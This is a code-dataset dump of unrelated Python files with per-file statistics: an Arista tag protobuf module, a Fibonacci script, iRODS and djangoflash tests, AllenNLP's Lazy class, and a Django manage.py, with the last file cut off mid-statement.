serialized_pb=_b('\n\x17\x61rista/tag.v1/tag.proto\x12\rarista.tag.v1\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x14\x66mp/extensions.proto\"h\n\x06TagKey\x12+\n\x05label\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue:\x04\x80\x8e\x19\x01\"@\n\x12InterfaceTagConfig\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey:\x06\xfa\x8d\x19\x02rw\"l\n\x0cInterfaceTag\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey\x12\x30\n\x0c\x63reator_type\x18\x02 \x01(\x0e\x32\x1a.arista.tag.v1.CreatorType:\x06\xfa\x8d\x19\x02ro\"\xe0\x01\n\x19InterfaceTagAssignmentKey\x12+\n\x05label\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12/\n\tdevice_id\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x32\n\x0cinterface_id\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.StringValue:\x04\x80\x8e\x19\x01\"]\n\x1cInterfaceTagAssignmentConfig\x12\x35\n\x03key\x18\x01 \x01(\x0b\x32(.arista.tag.v1.InterfaceTagAssignmentKey:\x06\xfa\x8d\x19\x02rw\"=\n\x0f\x44\x65viceTagConfig\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey:\x06\xfa\x8d\x19\x02rw\"i\n\tDeviceTag\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey\x12\x30\n\x0c\x63reator_type\x18\x02 \x01(\x0e\x32\x1a.arista.tag.v1.CreatorType:\x06\xfa\x8d\x19\x02ro\"\xa9\x01\n\x16\x44\x65viceTagAssignmentKey\x12+\n\x05label\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12/\n\tdevice_id\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue:\x04\x80\x8e\x19\x01\"W\n\x19\x44\x65viceTagAssignmentConfig\x12\x32\n\x03key\x18\x01 
\x01(\x0b\x32%.arista.tag.v1.DeviceTagAssignmentKey:\x06\xfa\x8d\x19\x02rw*[\n\x0b\x43reatorType\x12\x1c\n\x18\x43REATOR_TYPE_UNSPECIFIED\x10\x00\x12\x17\n\x13\x43REATOR_TYPE_SYSTEM\x10\x01\x12\x15\n\x11\x43REATOR_TYPE_USER\x10\x02\x42$Z\"arista/resources/arista/tag.v1;tagb\x06proto3')
,
dependencies=[google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,fmp_dot_extensions__pb2.DESCRIPTOR,])
_CREATORTYPE = _descriptor.EnumDescriptor(
name='CreatorType',
full_name='arista.tag.v1.CreatorType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='CREATOR_TYPE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATOR_TYPE_SYSTEM', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATOR_TYPE_USER', index=2, number=2,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=1131,
serialized_end=1222,
)
_sym_db.RegisterEnumDescriptor(_CREATORTYPE)
CreatorType = enum_type_wrapper.EnumTypeWrapper(_CREATORTYPE)
CREATOR_TYPE_UNSPECIFIED = 0
CREATOR_TYPE_SYSTEM = 1
CREATOR_TYPE_USER = 2
_TAGKEY = _descriptor.Descriptor(
name='TagKey',
full_name='arista.tag.v1.TagKey',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='label', full_name='arista.tag.v1.TagKey.label', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='arista.tag.v1.TagKey.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\200\216\031\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=96,
serialized_end=200,
)
_INTERFACETAGCONFIG = _descriptor.Descriptor(
name='InterfaceTagConfig',
full_name='arista.tag.v1.InterfaceTagConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.InterfaceTagConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=202,
serialized_end=266,
)
_INTERFACETAG = _descriptor.Descriptor(
name='InterfaceTag',
full_name='arista.tag.v1.InterfaceTag',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.InterfaceTag.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator_type', full_name='arista.tag.v1.InterfaceTag.creator_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002ro'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=268,
serialized_end=376,
)
_INTERFACETAGASSIGNMENTKEY = _descriptor.Descriptor(
name='InterfaceTagAssignmentKey',
full_name='arista.tag.v1.InterfaceTagAssignmentKey',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='label', full_name='arista.tag.v1.InterfaceTagAssignmentKey.label', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='arista.tag.v1.InterfaceTagAssignmentKey.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='device_id', full_name='arista.tag.v1.InterfaceTagAssignmentKey.device_id', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interface_id', full_name='arista.tag.v1.InterfaceTagAssignmentKey.interface_id', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\200\216\031\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=379,
serialized_end=603,
)
_INTERFACETAGASSIGNMENTCONFIG = _descriptor.Descriptor(
name='InterfaceTagAssignmentConfig',
full_name='arista.tag.v1.InterfaceTagAssignmentConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.InterfaceTagAssignmentConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=605,
serialized_end=698,
)
_DEVICETAGCONFIG = _descriptor.Descriptor(
name='DeviceTagConfig',
full_name='arista.tag.v1.DeviceTagConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.DeviceTagConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=700,
serialized_end=761,
)
_DEVICETAG = _descriptor.Descriptor(
name='DeviceTag',
full_name='arista.tag.v1.DeviceTag',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.DeviceTag.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator_type', full_name='arista.tag.v1.DeviceTag.creator_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002ro'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=763,
serialized_end=868,
)
_DEVICETAGASSIGNMENTKEY = _descriptor.Descriptor(
name='DeviceTagAssignmentKey',
full_name='arista.tag.v1.DeviceTagAssignmentKey',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='label', full_name='arista.tag.v1.DeviceTagAssignmentKey.label', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='arista.tag.v1.DeviceTagAssignmentKey.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='device_id', full_name='arista.tag.v1.DeviceTagAssignmentKey.device_id', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\200\216\031\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=871,
serialized_end=1040,
)
_DEVICETAGASSIGNMENTCONFIG = _descriptor.Descriptor(
name='DeviceTagAssignmentConfig',
full_name='arista.tag.v1.DeviceTagAssignmentConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.DeviceTagAssignmentConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1042,
serialized_end=1129,
)
_TAGKEY.fields_by_name['label'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_TAGKEY.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGCONFIG.fields_by_name['key'].message_type = _TAGKEY
_INTERFACETAG.fields_by_name['key'].message_type = _TAGKEY
_INTERFACETAG.fields_by_name['creator_type'].enum_type = _CREATORTYPE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['label'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['device_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['interface_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTCONFIG.fields_by_name['key'].message_type = _INTERFACETAGASSIGNMENTKEY
_DEVICETAGCONFIG.fields_by_name['key'].message_type = _TAGKEY
_DEVICETAG.fields_by_name['key'].message_type = _TAGKEY
_DEVICETAG.fields_by_name['creator_type'].enum_type = _CREATORTYPE
_DEVICETAGASSIGNMENTKEY.fields_by_name['label'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICETAGASSIGNMENTKEY.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICETAGASSIGNMENTKEY.fields_by_name['device_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICETAGASSIGNMENTCONFIG.fields_by_name['key'].message_type = _DEVICETAGASSIGNMENTKEY
DESCRIPTOR.message_types_by_name['TagKey'] = _TAGKEY
DESCRIPTOR.message_types_by_name['InterfaceTagConfig'] = _INTERFACETAGCONFIG
DESCRIPTOR.message_types_by_name['InterfaceTag'] = _INTERFACETAG
DESCRIPTOR.message_types_by_name['InterfaceTagAssignmentKey'] = _INTERFACETAGASSIGNMENTKEY
DESCRIPTOR.message_types_by_name['InterfaceTagAssignmentConfig'] = _INTERFACETAGASSIGNMENTCONFIG
DESCRIPTOR.message_types_by_name['DeviceTagConfig'] = _DEVICETAGCONFIG
DESCRIPTOR.message_types_by_name['DeviceTag'] = _DEVICETAG
DESCRIPTOR.message_types_by_name['DeviceTagAssignmentKey'] = _DEVICETAGASSIGNMENTKEY
DESCRIPTOR.message_types_by_name['DeviceTagAssignmentConfig'] = _DEVICETAGASSIGNMENTCONFIG
DESCRIPTOR.enum_types_by_name['CreatorType'] = _CREATORTYPE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TagKey = _reflection.GeneratedProtocolMessageType('TagKey', (_message.Message,), dict(
DESCRIPTOR = _TAGKEY,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.TagKey)
))
_sym_db.RegisterMessage(TagKey)
InterfaceTagConfig = _reflection.GeneratedProtocolMessageType('InterfaceTagConfig', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAGCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTagConfig)
))
_sym_db.RegisterMessage(InterfaceTagConfig)
InterfaceTag = _reflection.GeneratedProtocolMessageType('InterfaceTag', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTag)
))
_sym_db.RegisterMessage(InterfaceTag)
InterfaceTagAssignmentKey = _reflection.GeneratedProtocolMessageType('InterfaceTagAssignmentKey', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAGASSIGNMENTKEY,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTagAssignmentKey)
))
_sym_db.RegisterMessage(InterfaceTagAssignmentKey)
InterfaceTagAssignmentConfig = _reflection.GeneratedProtocolMessageType('InterfaceTagAssignmentConfig', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAGASSIGNMENTCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTagAssignmentConfig)
))
_sym_db.RegisterMessage(InterfaceTagAssignmentConfig)
DeviceTagConfig = _reflection.GeneratedProtocolMessageType('DeviceTagConfig', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAGCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTagConfig)
))
_sym_db.RegisterMessage(DeviceTagConfig)
DeviceTag = _reflection.GeneratedProtocolMessageType('DeviceTag', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTag)
))
_sym_db.RegisterMessage(DeviceTag)
DeviceTagAssignmentKey = _reflection.GeneratedProtocolMessageType('DeviceTagAssignmentKey', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAGASSIGNMENTKEY,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTagAssignmentKey)
))
_sym_db.RegisterMessage(DeviceTagAssignmentKey)
DeviceTagAssignmentConfig = _reflection.GeneratedProtocolMessageType('DeviceTagAssignmentConfig', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAGASSIGNMENTCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTagAssignmentConfig)
))
_sym_db.RegisterMessage(DeviceTagAssignmentConfig)
DESCRIPTOR._options = None
_TAGKEY._options = None
_INTERFACETAGCONFIG._options = None
_INTERFACETAG._options = None
_INTERFACETAGASSIGNMENTKEY._options = None
_INTERFACETAGASSIGNMENTCONFIG._options = None
_DEVICETAGCONFIG._options = None
_DEVICETAG._options = None
_DEVICETAGASSIGNMENTKEY._options = None
_DEVICETAGASSIGNMENTCONFIG._options = None
# @@protoc_insertion_point(module_scope)
| 39.343313 | 2,035 | 0.76744 | 2,405 | 19,711 | 5.985447 | 0.089813 | 0.035568 | 0.044321 | 0.029177 | 0.675512 | 0.647586 | 0.585689 | 0.580757 | 0.576381 | 0.576381 | 0 | 0.045612 | 0.109076 | 19,711 | 500 | 2,036 | 39.422 | 0.774102 | 0.041601 | 0 | 0.621924 | 1 | 0.002237 | 0.224465 | 0.186639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017897 | 0 | 0.017897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcb01ec305f04809e3a6ca1a1a52479e8d42fc7c | 262 | py | Python | languages/python/algorithm_fibo2.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 1 | 2021-04-09T04:15:24.000Z | 2021-04-09T04:15:24.000Z | languages/python/algorithm_fibo2.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | null | null | null | languages/python/algorithm_fibo2.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 1 | 2021-07-31T02:45:29.000Z | 2021-07-31T02:45:29.000Z | def fibo(n):
    f = [0, 1]
    if n in f:
        return f[n]
    for i in range(2, n + 1):
        f.append(f[i-1] + f[i-2])
    return f[n]


print(fibo(37))

"""
print(fibo(1))
print(fibo(2))
print(fibo(3))
print(fibo(4))
print(fibo(5))
print(fibo(6))
print(fibo(37))
"""
| 13.789474 | 33 | 0.541985 | 55 | 262 | 2.581818 | 0.363636 | 0.507042 | 0.112676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08377 | 0.270992 | 262 | 18 | 34 | 14.555556 | 0.659686 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.125 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcb5ff1aa487732a140a3585c9ba23911a288769 | 668 | py | Python | scripts/irods/test/test_client_hints.py | JustinKyleJames/irods | 59e9db75200e95796ec51ec20eb3b185d9e4b5f5 | [
"BSD-3-Clause"
] | 333 | 2015-01-15T15:42:29.000Z | 2022-03-19T19:16:15.000Z | scripts/irods/test/test_client_hints.py | JustinKyleJames/irods | 59e9db75200e95796ec51ec20eb3b185d9e4b5f5 | [
"BSD-3-Clause"
] | 3,551 | 2015-01-02T19:55:40.000Z | 2022-03-31T21:24:56.000Z | scripts/irods/test/test_client_hints.py | JustinKyleJames/irods | 59e9db75200e95796ec51ec20eb3b185d9e4b5f5 | [
"BSD-3-Clause"
] | 148 | 2015-01-31T16:13:46.000Z | 2022-03-23T20:23:43.000Z | from __future__ import print_function
import sys
import shutil
import os

if sys.version_info >= (2, 7):
    import unittest
else:
    import unittest2 as unittest

import datetime
import socket

from .. import test
from . import settings
from .. import lib
from . import resource_suite
from ..configuration import IrodsConfig


class Test_ClientHints(resource_suite.ResourceBase, unittest.TestCase):
    def setUp(self):
        super(Test_ClientHints, self).setUp()

    def tearDown(self):
        super(Test_ClientHints, self).tearDown()

    def test_client_hints(self):
        self.admin.assert_icommand('iclienthints', 'STDOUT_SINGLELINE', 'plugins')
| 22.266667 | 82 | 0.747006 | 84 | 668 | 5.761905 | 0.52381 | 0.082645 | 0.053719 | 0.099174 | 0.115702 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005415 | 0.170659 | 668 | 29 | 83 | 23.034483 | 0.868231 | 0 | 0 | 0.086957 | 0 | 0 | 0.053973 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.130435 | false | 0 | 0.608696 | 0 | 0.782609 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fcbf5526c7f9b990b21dd4cfa6f440213421292a | 2,210 | py | Python | allennlp/common/lazy.py | jayjfu/allennlp | a3732d00a3e7dae3bff54bff19ece7b8b6eaca88 | [
"Apache-2.0"
] | 2 | 2020-08-29T20:29:38.000Z | 2022-03-28T02:58:42.000Z | allennlp/common/lazy.py | jayjfu/allennlp | a3732d00a3e7dae3bff54bff19ece7b8b6eaca88 | [
"Apache-2.0"
] | 67 | 2020-09-23T23:26:11.000Z | 2022-03-29T13:04:00.000Z | allennlp/common/lazy.py | jayjfu/allennlp | a3732d00a3e7dae3bff54bff19ece7b8b6eaca88 | [
"Apache-2.0"
] | 2 | 2021-01-19T10:58:28.000Z | 2022-02-23T19:09:36.000Z | import inspect
from typing import Callable, Generic, TypeVar, Type, Union
from allennlp.common.params import Params
T = TypeVar("T")
class Lazy(Generic[T]):
    """
    This class is for use when constructing objects using `FromParams`, when an argument to a
    constructor has a _sequential dependency_ with another argument to the same constructor.

    For example, in a `Trainer` class you might want to take a `Model` and an `Optimizer` as arguments,
    but the `Optimizer` needs to be constructed using the parameters from the `Model`. You can give
    the type annotation `Lazy[Optimizer]` to the optimizer argument, then inside the constructor
    call `optimizer.construct(parameters=model.parameters)`.

    This is only recommended for use when you have registered a `@classmethod` as the constructor
    for your class, instead of using `__init__`. Having a `Lazy[]` type annotation on an argument
    to an `__init__` method makes your class completely dependent on being constructed using the
    `FromParams` pipeline, which is not a good idea.

    The actual implementation here is incredibly simple; the logic that handles the lazy
    construction is actually found in `FromParams`, where we have a special case for a `Lazy` type
    annotation.

    ```python
    @classmethod
    def my_constructor(
        cls,
        some_object: Lazy[MyObject],
        optional_object: Lazy[MyObject] = None,
        required_object_with_default: Lazy[MyObject] = Lazy(MyObjectDefault),
    ) -> MyClass:
        obj1 = some_object.construct()
        obj2 = None if optional_object is None else optional_object.construct()
        obj3 = required_object_with_default.construct()
    ```
    """

    def __init__(self, constructor: Union[Type[T], Callable[..., T]]):
        constructor_to_use: Callable[..., T]

        if inspect.isclass(constructor):

            def constructor_to_use(**kwargs):
                return constructor.from_params(Params({}), **kwargs)  # type: ignore[union-attr]

        else:
            constructor_to_use = constructor
        self._constructor = constructor_to_use

    def construct(self, **kwargs) -> T:
        return self._constructor(**kwargs)
| 37.457627 | 103 | 0.697738 | 282 | 2,210 | 5.336879 | 0.425532 | 0.034552 | 0.042525 | 0.025249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001741 | 0.220362 | 2,210 | 58 | 104 | 38.103448 | 0.871735 | 0.661086 | 0 | 0 | 0 | 0 | 0.001572 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.133333 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
fcd586ec0db6d2f4b8eed8f2b31ec8ed9cf51566 | 687 | py | Python | app/backend/manage.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 37 | 2017-06-30T18:08:51.000Z | 2022-02-13T18:04:10.000Z | app/backend/manage.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 544 | 2017-06-21T00:29:20.000Z | 2022-02-01T21:37:38.000Z | app/backend/manage.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 59 | 2017-03-10T17:55:02.000Z | 2021-11-16T19:20:08.000Z | #!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "gwells.settings")
    from django.core.management import execute_from_command_line
    from django.conf import settings
    if settings.DEBUG:
        if os.environ.get('RUN_MAIN') or os.environ.get('WERKZEUG_RUN_MAIN'):
            if not os.environ.get('PYCHARM_HOSTED'):
                import ptvsd
                ptvsd.enable_attach(address=('0.0.0.0', 3000))
                print("Attached remote debugger ptvsd")
            else:
                print("ptvsd is not compatible with PyCharm, it uses pydevd")
    execute_from_command_line(sys.argv)
| 32.714286 | 77 | 0.650655 | 89 | 687 | 4.786517 | 0.550562 | 0.084507 | 0.084507 | 0.103286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015474 | 0.247453 | 687 | 20 | 78 | 34.35 | 0.808511 | 0.029112 | 0 | 0 | 0 | 0 | 0.25976 | 0.033033 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
fcd8a7fe801c380d0cc99b020e3491ff1be849f1 | 1,324 | py | Python | src/djangoflash/tests/context_processors.py | duct-tape/django-flash | ce77d3ca3d6823068984f898c3b44e2fef0beb8b | [
"BSD-3-Clause"
] | null | null | null | src/djangoflash/tests/context_processors.py | duct-tape/django-flash | ce77d3ca3d6823068984f898c3b44e2fef0beb8b | [
"BSD-3-Clause"
] | null | null | null | src/djangoflash/tests/context_processors.py | duct-tape/django-flash | ce77d3ca3d6823068984f898c3b44e2fef0beb8b | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""djangoflash.context_processors test cases.
"""
from unittest import TestCase
from django.core.exceptions import SuspiciousOperation
from django.http import HttpRequest
from djangoflash.context_processors import CONTEXT_VAR, flash
from djangoflash.models import FlashScope
class FlashContextProcessorTestCase(TestCase):
"""Tests the context processor used to expose the flash to view templates.
"""
def setUp(self):
self.request = HttpRequest()
self.scope = FlashScope();
setattr(self.request, CONTEXT_VAR, self.scope);
def test_expose_flash(self):
"""FlashContextProcessor: should expose the flash to view templates.
"""
self.assertEqual(flash(self.request), {CONTEXT_VAR:self.scope})
def test_expose_inexistent_flash(self):
"""FlashContextProcessor: should fail when there's no flash available.
"""
delattr(self.request, CONTEXT_VAR)
self.assertTrue(isinstance(flash(self.request)[CONTEXT_VAR], \
